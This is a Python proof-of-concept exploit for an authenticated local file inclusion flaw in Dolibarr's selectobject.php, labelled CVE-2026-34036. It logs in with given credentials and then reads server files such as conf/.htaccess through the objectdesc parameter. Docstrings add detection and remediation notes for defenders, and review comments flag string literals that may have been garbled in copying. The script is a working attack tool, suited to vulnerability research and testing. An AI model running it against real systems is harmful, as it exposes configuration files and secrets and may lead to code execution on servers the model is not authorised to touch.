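#!/usr/bin/env python3
"""CVE-2026-34036 - Dolibarr selectobject.php authenticated LFI PoC

What the script does, as visible in the code below:

* logs in through the normal web login form with a valid account, then
* sends one GET request to ``/core/ajax/selectobject.php`` in which the
  second colon-separated field of the ``objectdesc`` parameter carries the
  file path supplied on the command line, and prints the response body.

Notes for reviewers and defenders:

* The issue is post-authentication: a working session is needed before the
  endpoint is reached, so the relevant log trail starts with a login.
* Detection: look in web-server access logs for requests to
  ``/core/ajax/selectobject.php`` whose ``objectdesc`` path field does not
  look like the values the application normally sends (presumably module
  class files; verify against your own baseline traffic).
* "LFI" suggests the server-side sink is a PHP include; if so, a file
  containing PHP would be executed rather than echoed. Confirm against the
  advisory for this CVE.
* Remediation: apply the vendor fix referenced by the advisory
  (fixed version: <see vendor advisory>; not stated on this page).
"""
import argparse
import re

import requests

# Upper bound, in seconds, for every HTTP call. requests has no default
# timeout, so without this a stalled server would hang the script forever.
HTTP_TIMEOUT = 15


def login(s, url, username, password):
    """Authenticate the session ``s`` against the instance at ``url``.

    Fetches the landing page to pick up the anti-CSRF ``token`` form field,
    posts the login form, then checks that the home page contains a logout
    link. Exits the process with "[!] Login failed" when it does not.

    Args:
        s: a ``requests.Session``; it keeps the session cookie for later calls.
        url: base URL of the instance, without a trailing slash.
        username: account name to log in with.
        password: password for that account.
    """
    page = s.get(f"{url}/", timeout=HTTP_TIMEOUT).text
    token = re.search(r'name="token"\s+value="([^"]*)"', page)
    s.post(
        f"{url}/index.php?mainmenu=home",
        data={
            # An empty token is sent when the field was not found on the page.
            "token": token.group(1) if token else "",
            "actionlogin": "login",
            "loginfunction": "loginfunction",
            "username": username,
            "password": password,
        },
        timeout=HTTP_TIMEOUT,
    )
    home = s.get(f"{url}/index.php?mainmenu=home", timeout=HTTP_TIMEOUT).text
    # The logout link is only rendered for an authenticated session.
    if "/user/logout.php" not in home:
        raise SystemExit("[!] Login failed")
    print("[+] Login successful")


def read_file(s, url, path):
    """Request ``path`` through selectobject.php and return the trimmed body.

    Args:
        s: an authenticated ``requests.Session`` (see ``login``).
        url: base URL of the instance, without a trailing slash.
        path: file path placed in the second field of ``objectdesc``.

    Returns:
        The response text, cut at the first PHP warning / fatal-error marker
        if one is found, with surrounding whitespace stripped.
    """
    resp = s.get(
        f"{url}/core/ajax/selectobject.php",
        params={
            "outjson": "0",
            "htmlname": "x",
            "objectdesc": f"A:{path}:0",
        },
        timeout=HTTP_TIMEOUT,
    )
    body = resp.text
    # Trim PHP warnings/fatal errors from output.
    # NOTE(review): on this page both marker literals are broken across a
    # line, which suggests markup inside them was lost when the page was
    # rendered. They are reproduced here as the visible characters (a line
    # break followed by the "\n" escape); confirm against the original PoC.
    for marker in ("\n\nWarning", "\n\nFatal error"):
        pos = body.find(marker)
        if pos != -1:
            body = body[:pos]
    return body.strip()


def main():
    """Parse the command line, log in, and print the returned content."""
    p = argparse.ArgumentParser(description="CVE-2026-34036 PoC")
    # The default targets a local instance over plain HTTP; credentials are
    # sent unencrypted on that URL.
    p.add_argument("--url", default="http://127.0.0.1:8080")
    p.add_argument("--username", required=True)
    # NOTE(review): a password given on the command line is visible in the
    # process list and shell history; use a throwaway lab account.
    p.add_argument("--password", required=True)
    p.add_argument("--file", required=True, help="e.g. conf/.htaccess")
    args = p.parse_args()

    s = requests.Session()
    try:
        login(s, args.url, args.username, args.password)
        content = read_file(s, args.url, args.file)
    except requests.RequestException as exc:
        # Connection errors and timeouts end the run with one line instead
        # of a traceback.
        raise SystemExit(f"[!] Request failed: {exc}")

    print(f"[+] {args.file}\n{'=' * 60}")
    print(content if content else "(empty)")
    print("=" * 60)


if __name__ == "__main__":
    main()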